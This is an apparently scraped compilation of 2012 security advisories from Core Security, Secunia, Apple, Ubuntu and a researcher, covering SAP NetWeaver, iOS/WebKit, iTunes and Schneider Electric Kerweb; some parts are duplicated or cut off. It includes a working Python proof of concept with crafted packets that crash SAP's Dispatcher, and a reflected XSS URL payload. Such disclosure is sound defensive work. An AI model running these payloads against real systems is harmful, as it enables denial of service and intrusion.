Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

The DiagTraceAtoms function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application. ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: SAP NetWeaver Denial of Service and Code Execution Vulnerabilities SECUNIA ADVISORY ID: SA48980 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/48980/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=48980 RELEASE DATE: 2012-05-09 DISCUSS ADVISORY: http://secunia.com/advisories/48980/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/48980/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=48980 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Core Security Technologies has reported multiple vulnerabilities in SAP NetWeaver, which can be exploited by malicious people to cause a DoS (Denial of Service) and compromise a vulnerable system. The vulnerabilities are reported in versions 7.0 EHP1 and 7.0 EHP2. Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: Martin Gallo, Core Security Technologies. ORIGINAL ADVISORY: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . *Advisory Information* Title: SAP Netweaver Dispatcher Multiple Vulnerabilities Advisory ID: CORE-2012-0123 Advisory URL: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities Date published: 2012-05-08 Date of last update: 2012-05-08 Vendors contacted: SAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514 3. *Vulnerability Description* SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. By sending different messages, the different vulnerabilities can be triggered. 4. *Vulnerable packages* . SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Vendor did not provide this information. 6. *Vendor Information, Solutions and Workarounds* SAP released the security note https://service.sap.com/sap/support/notes/1687910 regarding these issues. Contact SAP for further information. Martin Gallo proposed the following actions to mitigate the impact of the vulnerabilities: 1. Disable work processes' Developer Traces for the 'Dialog Processing' component (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). 2. Restrict access to the Dispatcher service's TCP ports (3200/3299) (for all vulnerabilities). 3. Restrict access to the work process management transactions SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). 7. *Credits* These vulnerabilities were discovered and researched by Martin Gallo from http://www.coresecurity.com/content/services-overview-core-security-consulting-services. The publication of this advisory was coordinated by Fernando Miranda from http://www.coresecurity.com/content/corelabs-advisories . 8. *Technical Description / Proof of Concept Code* *NOTE:* (The tracing of 'Dialog processing' has to be in level 2 or 3 in order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). The following python script can be used to reproduce the vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-l", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3200) (options, args) = parser.parse_args() def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize(sock): diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00" user_connect = "\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8" support_data = "\x10\x04\x0b\x00\x20" support_data+= "\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93" support_data+= "\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00" dpheader = "\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" dpheader+= struct.pack("I", len(diagheader + user_connect + support_data)) dpheader+= "\x00\xff\xff\xff\xff\xff\xff " dpheader+= "terminalXXXXXXX" dpheader+= "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" send_packet(sock, dpheader + diagheader + user_connect + support_data) def send_message(sock, message): diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00" step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01" eom = "\x0c" send_packet(sock, diagheader + step + message + eom) # Connect and send initialization packet connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((options.hostname, options.port)) initialize(connection) receive(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. *SAP Netweaver DiagTraceR3Info Vulnerability* [CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver 'disp+work.exe' module process a specially crafted network packet. Malicious packets are processed by the vulnerable function 'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace is configured at levels 2 or 3 for the "Dialog processor" component of the "Dialog" work process handling the packet [2]. The following python code can be used to trigger the vulnerability: /----- crash = "X"*114 + "\xff\xff" # --> Unicode Address to call ! crash+= "Y"*32 crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash send_message(connection, crash) -----/ 8.2. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack against the vulnerable systems. The following python code can be used to trigger the vulnerability: /----- crash = "\x12\x04\x18\xff\xff\xff\xffCrash!" send_message(connection, crash) -----/ 8.3. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. The following python code can be used to trigger the vulnerability: /----- crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8 send_message(connection, crash) -----/ 8.4. /----- crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51" send_message(connection, crash) -----/ 8.5. /----- crash = "\x10\x0c\x0e\x00\0a" + "A"*10 send_message(connection, crash) -----/ 8.6. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. /----- crash = "\x10\x0f\x01\x00\x11" + "A"*17 send_message(connection, crash) -----/ 9. *Report Timeline* . 2012-01-24: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for February 21st, 2012. 2012-01-24: Core sends an advisory draft with technical details. 2012-01-24: The SAP team confirms the reception of the issue and asks to use the security ID 582820-2012 for further communication. SAP also notifies its terms and conditions [3], and asks for Core to commit to that guideline. 2012-02-01: The Core Advisories Team communicates that it has its own guidelines for the advisories publication process, which may conflict with SAP's guidelines. In particular, Core does not guarantee that the publication of the advisory will be postponed until a fix or patch is made available by SAP. If information about this vulnerability is partially or completely leaked by a third party, the advisory would be released immediately as forced release. Despite this, the Core team commits to comply with SAP's guidelines as much as possible. 2012-02-21: First release date missed. 2012-02-22: Core asks for the status of the fix and notifies that the release date was missed. 2012-02-23: SAP notifies that, because the development team has to downport the solutions for a huge bunch of software releases, the earliest release date for the patches would be May 8th 2012. 2012-02-23: Core re-schedules the advisory publication to May 8th. 2012-04-16: Core asks if the patching process is still on track to release patches on May 8th and requests a status of the fix. 2012-04-16: Vendor notifies that the release date is still planned for May 8th, but due to quality control processes this date cannot be guaranteed. 2012-05-04: Core notifies that everything is ready for publication and requests the vendor to confirm the release date and the list of affected platforms (no reply received). 2012-05-07: Core asks again for the status of the fix. 2012-05-08: SAP notifies that they have released the security note 1687910 [4] on May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP also requests Core to remove all the technical information researched by Martin Gallo in [Sec. 8]. 2012-05-08: Core replies that the reporting of vulnerabilities is aimed at helping vulnerable users to understand and address the issues; the advisory will thus be released with the technical information. 2012-05-08: Advisory CORE-2012-0123 published. 10. *References* [1] http://www.sap.com/platform/netweaver/index.epx [2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm [3] SAP's legal information, terms and conditions http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46. [4] SAP security note 1687910 https://service.sap.com/sap/support/notes/1687910. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

Safari in Apple iOS before 5.1.1 allows remote attackers to spoof the location bar's URL via a crafted web site. Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems. The vulnerability exists in versions of Safari prior to Apple iOS 5.1.1. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2012-05-07-1 iOS 5.1.1 Software Update iOS 5.1.1 Software Update is now available and addresses the following: Safari Available for: iPhone 3GS, iPhone 4, iPhone 4S, iPod touch (3rd generation) and later, iPad, iPad 2 Impact: A maliciously crafted website may be able to spoof the address in the location bar Description: A URL spoofing issue existed in Safari. This could be used in a malicious web site to direct the user to a spoofed site that visually appeared to be a legitimate domain. This issue is addressed through improved URL handling. This issue does not affect OS X systems. CVE-ID CVE-2012-0674 : David Vieira-Kurz of MajorSecurity (majorsecurity.net) WebKit Available for: iPhone 3GS, iPhone 4, iPhone 4S, iPod touch (3rd generation) and later, iPad, iPad 2 Impact: Visiting a maliciously crafted website may lead to a cross- site scripting attack Description: Multiple cross-site scripting issues existed in WebKit. CVE-ID CVE-2011-3046 : Sergey Glazunov working with Google's Pwnium contest CVE-2011-3056 : Sergey Glazunov WebKit Available for: iPhone 3GS, iPhone 4, iPhone 4S, iPod touch (3rd generation) and later, iPad, iPad 2 Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in WebKit. CVE-ID CVE-2012-0672 : Adam Barth and Abhishek Arya of the Google Chrome Security Team Installation note: This update is only available through iTunes, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from www.apple.com/itunes/ iTunes will automatically check Apple's update server on its weekly schedule. When an update is detected, it will download it. When the iPhone, iPod touch or iPad is docked, iTunes will present the user with the option to install the update. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iPhone, iPod touch, or iPad. The automatic update process may take up to a week depending on the day that iTunes checks for updates. You may manually obtain the update via the Check for Updates button within iTunes. After doing this, the update can be applied when your iPhone, iPod touch, or iPad is docked to your computer. To check that the iPhone, iPod touch, or iPad has been updated: * Navigate to Settings * Select General * Select About. The version after applying this update will be "5.1.1". Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.16 (Darwin) iQEcBAEBAgAGBQJPpBcyAAoJEGnF2JsdZQeexJYH/0aYO0MULFXYARidSV22JdjG a1+yXKn8Rv2vv+8yStgKK2mWu18hvYWQ+whtvCzs1OefiVsq1nOvdCL1G62ybcYv O9BiHEDsuu+On2nAPiglu+luokByKLlZcIaM1Qa3pXHkiI8jlH7y7XuuoFsVt1Vc 284JgvV/sHnvesne2GsNyoRBJjfkliqXCgb1zmQWO9xX7HEJCaMNlc5Bwdonm26q 3OEKr2UQxvmWCbnCroiQ5KmEM+gLJSfLLOymow9xa4gM8aM87BXGWNMEKVs8LRLm dHngmEmzEa/Fx9PnR7rqjTCAMS8hR7aFcCYNTWjfR+keRXx7OHhCm88MfndryS8= =qhqL -----END PGP SIGNATURE-----

WebKit in Apple iOS before 5.1.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site. WebKit is prone to an unspecified memory-corruption vulnerability. An attacker can exploit this issue by enticing an unsuspecting user into visiting a malicious webpage with a vulnerable application. Very few technical details are currently available. We will update this BID when more information emerges. iTunes is a free application for your Mac or PC. It lets you organize and play digital music and video on your computer. It can automatically download new music, app, and book purchases across all your devices and computers. And it’s a store that has everything you need to be entertained. Anywhere. a specially crafted .M3U file. Successful exploitation could allow execution of arbitrary code on the affected node.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (940.fc0): Access violation - code c0000005 (!!! second chance !!!)<br/> eax=41414141 ebx=08508cd8 ecx=41414141 edx=052a6528 esi=052a64b0 edi=0559ef20<br/> eip=41414141 esp=0012d8e8 ebp=7c90ff2d iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206<br/><unloaded_card.dll>+0x41414130:<br/> 41414141 ?? ???<br/><br/> ~~~<br/><br/> (6b0.a04): Access violation - code c0000005 (!!! second chance !!!)<br/> eax=41414141 ebx=00000000 ecx=00000014 edx=41414141 esi=41414141 edi=0187e10d<br/> eip=0187deec esp=0b0cfcd0 ebp=0b0cfcf0 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206<br/> Defaulted to export symbols for C:\Program Files\Common Files\Apple\Apple Application Support\CoreFoundation.dll -<br/> CoreFoundation!CFWriteStreamCreateWithAllocatedBuffers+0x40:<br/> 0187deec 8b00 mov eax,dword ptr [eax] ds:0023:41414141=????????<br/></unloaded_card.dll></code><br/> --------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 EN (32bit)Microsoft Windows 7 Ultimate SP1 EN (64bit). WebKit is a set of open source web browser engines jointly developed by companies such as KDE, Apple (Apple), and Google (Google), and is currently used by browsers such as Apple Safari and Google Chrome. Vulnerabilities exist in WebKit versions prior to Apple iOS 5.1.1. ============================================================================ Ubuntu Security Notice USN-1524-1 August 08, 2012 webkit vulnerabilities ============================================================================ A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 12.04 LTS Summary: Multiple security vulnerabilities were fixed in WebKit. Software Description: - webkit: Web content engine library for GTK+ Details: A large number of security issues were discovered in the WebKit browser and JavaScript engines. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 12.04 LTS: libjavascriptcoregtk-1.0-0 1.8.1-0ubuntu0.12.04.1 libjavascriptcoregtk-3.0-0 1.8.1-0ubuntu0.12.04.1 libwebkitgtk-1.0-0 1.8.1-0ubuntu0.12.04.1 libwebkitgtk-3.0-0 1.8.1-0ubuntu0.12.04.1 After a standard system update you need to restart your session to make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1524-1 CVE-2011-3046, CVE-2011-3050, CVE-2011-3067, CVE-2011-3068, CVE-2011-3069, CVE-2011-3071, CVE-2011-3073, CVE-2011-3074, CVE-2011-3075, CVE-2011-3078, CVE-2012-0672, CVE-2012-3615, CVE-2012-3655, CVE-2012-3656, CVE-2012-3680, https://launchpad.net/bugs/1027283 Package Information: https://launchpad.net/ubuntu/+source/webkit/1.8.1-0ubuntu0.12.04.1 . ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Apple iTunes Two Vulnerabilities SECUNIA ADVISORY ID: SA49489 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49489/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49489 RELEASE DATE: 2012-06-12 DISCUSS ADVISORY: http://secunia.com/advisories/49489/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49489/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=49489 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Apple has reported two vulnerabilities in Apple iTunes, which can be exploited by malicious people to compromise a user's system. 1) An error in the handling of .m3u playlists can be exploited to cause a heap-based buffer overflow via a specially crafted M3U (".m3u") file. Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: The vendor credits: 1) Gjoko Krstic, Zero Science Lab. ORIGINAL ADVISORY: Apple: http://support.apple.com/kb/HT5318 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2012-05-07-1 iOS 5.1.1 Software Update iOS 5.1.1 Software Update is now available and addresses the following: Safari Available for: iPhone 3GS, iPhone 4, iPhone 4S, iPod touch (3rd generation) and later, iPad, iPad 2 Impact: A maliciously crafted website may be able to spoof the address in the location bar Description: A URL spoofing issue existed in Safari. This could be used in a malicious web site to direct the user to a spoofed site that visually appeared to be a legitimate domain. This issue is addressed through improved URL handling. This issue does not affect OS X systems. CVE-ID CVE-2012-0674 : David Vieira-Kurz of MajorSecurity (majorsecurity.net) WebKit Available for: iPhone 3GS, iPhone 4, iPhone 4S, iPod touch (3rd generation) and later, iPad, iPad 2 Impact: Visiting a maliciously crafted website may lead to a cross- site scripting attack Description: Multiple cross-site scripting issues existed in WebKit. CVE-ID CVE-2011-3046 : Sergey Glazunov working with Google's Pwnium contest CVE-2011-3056 : Sergey Glazunov WebKit Available for: iPhone 3GS, iPhone 4, iPhone 4S, iPod touch (3rd generation) and later, iPad, iPad 2 Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in WebKit. CVE-ID CVE-2012-0672 : Adam Barth and Abhishek Arya of the Google Chrome Security Team Installation note: This update is only available through iTunes, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from www.apple.com/itunes/ iTunes will automatically check Apple's update server on its weekly schedule. When an update is detected, it will download it. When the iPhone, iPod touch or iPad is docked, iTunes will present the user with the option to install the update. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iPhone, iPod touch, or iPad. The automatic update process may take up to a week depending on the day that iTunes checks for updates. You may manually obtain the update via the Check for Updates button within iTunes. After doing this, the update can be applied when your iPhone, iPod touch, or iPad is docked to your computer. To check that the iPhone, iPod touch, or iPad has been updated: * Navigate to Settings * Select General * Select About. The version after applying this update will be "5.1.1". Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.16 (Darwin) iQEcBAEBAgAGBQJPpBcyAAoJEGnF2JsdZQeexJYH/0aYO0MULFXYARidSV22JdjG a1+yXKn8Rv2vv+8yStgKK2mWu18hvYWQ+whtvCzs1OefiVsq1nOvdCL1G62ybcYv O9BiHEDsuu+On2nAPiglu+luokByKLlZcIaM1Qa3pXHkiI8jlH7y7XuuoFsVt1Vc 284JgvV/sHnvesne2GsNyoRBJjfkliqXCgb1zmQWO9xX7HEJCaMNlc5Bwdonm26q 3OEKr2UQxvmWCbnCroiQ5KmEM+gLJSfLLOymow9xa4gM8aM87BXGWNMEKVs8LRLm dHngmEmzEa/Fx9PnR7rqjTCAMS8hR7aFcCYNTWjfR+keRXx7OHhCm88MfndryS8= =qhqL -----END PGP SIGNATURE----- . CVE-ID CVE-2012-0672 : Adam Barth and Abhishek Arya of the Google Chrome Security Team WebKit Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7.4, OS X Lion Server v10.7.4, Windows 7, Vista, XP SP2 or later Impact: A maliciously crafted website may be able to populate form inputs on another website with arbitrary values Description: A state tracking issue existed in WebKit's handling of forms. CVE-ID CVE-2012-0676 : Andreas Akre Solberg of UNINETT AS, Aaron Roots of Deakin University ITSD, Tyler Goen Note: In addition, this update disables Adobe Flash Player if it is older than 10.1.102.64 by moving its files to a new directory. This update presents the option to install an updated version of Flash Player from the Adobe website

Multiple cross-site scripting (XSS) vulnerabilities in Schneider Electric Kerweb before 3.0.1 and Kerwin before 6.0.1 allow remote attackers to inject arbitrary web script or HTML via (1) the evtvariablename parameter in an evts.xml action to kw.dll, (2) unspecified search fields, or (3) unspecified content-display fields. (1) kw.dll of evts.xml In action evtvariablename Parameters (2) Unspecified search field (3) Unspecified content display field. Schneider Electric provides total solutions for the energy and infrastructure, industrial, data center and network, building and residential markets in more than 100 countries. The kw.dll provided by Schneider Electric Telecontrol Kerwin/Kerweb fails to properly filter the 'evtvariablename' parameter, etc., and an attacker can exploit the vulnerability for HTML injection attacks, build malicious WEB pages, entice users to parse, obtain sensitive information or hijack user sessions. Multiple Schneider Electric Telecontrol products are prone to an HTML-injection vulnerability because they fail to sufficiently sanitize user-supplied data before it is used in dynamic content. Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible. The following products are affected: Schneider Electric Telecontrol Kerweb versions prior to 3.0.1 Schneider Electric Telecontrol Kerwin versions prior to 6.0.1. Thus, the web application suffers from multiple reflected XSS vulnerabilities. Exploitation is made easier as parameters are passed with GET HTTP method. Example: An URL can be forged by injecting code in one of the parameter, like 'evtvariablename' here: http://<server>/kw.dll?page=evts.xml&sessionid=xxx&nomenu=&typeevtwin=alms&dt=&gtvariablevalue=&ltvariablevalue=&variablevalue=&nevariablevalue=&evtclass=&evtdevicezone=&evtdevicecountry=&evtdeviceregion=&evtstatustype=&evtseveritytype=&evtstatus=&evtseverity=&evtlevel=&gtdateapp=&ltdateapp=&gtdaterec=&ltdaterec=&evtvariablename="</script><script>alert(1)</script>"&evtdevicename=&evtnature=&evttype=&gtduration=&ltduration=&gtdurationvalue=&gtdurationwide=1&ltdurationvalue=&ltdurationwide=1 Vendor status: Vendor was contacted and a fix was released (with Kerweb 3.0.1 and Kerwin 6.0.1) Mitigation: Upgrade to Kerweb 3.0.1 and Kerwin 6.0.1 CVE: CVE-2012-1990 Timeline: 06/20/2011: vendor disclosure (ticket reference : KN10915) 07/22/2011: vendor response 09/01/2012: fix released 05/05/2012: public disclosure --- phocean . ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Schneider Electric Kerwin Cross-Site Scripting Vulnerabilities SECUNIA ADVISORY ID: SA49041 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49041/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49041 RELEASE DATE: 2012-05-10 DISCUSS ADVISORY: http://secunia.com/advisories/49041/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49041/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=49041 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: phocean has reported some vulnerabilities in Kerwin, which can be exploited by malicious people to conduct cross-site scripting attacks. 1) Input passed via the "evtvariablename" parameter to kw.dll is not properly sanitised before being returned to the user. 2) Certain input used for searching and displaying content is not properly sanitised before being returned to the user. SOLUTION: Reportedly fixed in version 6.0.1. PROVIDED AND/OR DISCOVERED BY: phocean ORIGINAL ADVISORY: http://www.phocean.net/2012/05/08/cve-2012-1990-kerwebkerwin-xss-vulnerabilities.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service 